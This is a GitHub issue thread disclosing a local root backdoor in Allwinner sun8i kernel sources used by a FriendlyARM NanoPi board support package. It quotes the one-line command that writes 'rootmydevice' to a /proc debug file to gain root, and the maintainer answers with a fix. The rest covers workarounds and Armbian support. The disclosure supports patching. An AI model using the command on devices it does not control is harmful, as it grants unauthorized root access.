Local privileges escalation

friendlyarm / h3_lichee

BSP for FriendlyARM NanoPi H3

106 stars 104 forks source link

Local privileges escalation #1

Closed ThomasKaiser closed 8 years ago

ThomasKaiser commented 8 years ago

Seems like Allwinner's sun8i kernel sources allow everyone to become root easily:

tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
tk@bananapim3:~$ id
uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev),1000(tk)

Please check and fix if you're affected too.

wuweidong0107 commented 8 years ago

Thank you very much. See commit 5d4d02b1. Looking forward to more feedback.

ThomasKaiser commented 8 years ago

Thx for the fast reaction. But to protect your users OS images should be updated too, shouldn't they? Or at least people informed that by setting permissions to 000 from within /etc/rc.local a workaround exists.

BTW: We fully support M1 so maybe it's also a good idea to point your users to Armbian? http://www.armbian.com/nanopi-m1/

wuweidong0107 commented 8 years ago

Wow, you are a hero.We will update our ROMs & let our customer enjoy armbian as soon as possible.

ThomasKaiser commented 8 years ago

You're welcome! Please keep in mind that I added support solely based on contents of fex file from your Github repo. If settings there are correct then it should work perfectly since the only real change compared to some Oranges is blue vs. red led.

To be able to fully support the board (inclusive camera) it might be worth the efforts to send a developer sample to Igor. Address valid using whois igorpecovnik.com

ThomasKaiser commented 8 years ago

And just a small note in case you didn't noticed yet. You can use/promote my RPi-Monitor installer for H3 as well as our h3disp utility to provide simple HDMI display adjustments (might require changes to find script.bin if not the usual locations are used).

wuweidong0107 commented 8 years ago

Hey Thomas, we've tried armbian and will release its details on our wiki shortly. BTW, we prefer "root@nanopi-M1:~#" rather than "root@orangepione:~#"...

ThomasKaiser commented 8 years ago

Oops, sorry. This is just another drawback of our (failed) auto detection approach we invented when we started supporting H3 boards a few months back. We will fix that most probably with next release when we create again for every single board an own image (now we create one for all Fast Ethernet equipped H3 boards and one for those with GbE -- but this does not work reliably). We wanted to fix that prior to 5.10 but it got postponed for several reasons :(

ThomasKaiser commented 8 years ago

Just FYI: http://forum.armbian.com/index.php/topic/1015-nanopi-m1/?view=getlastpost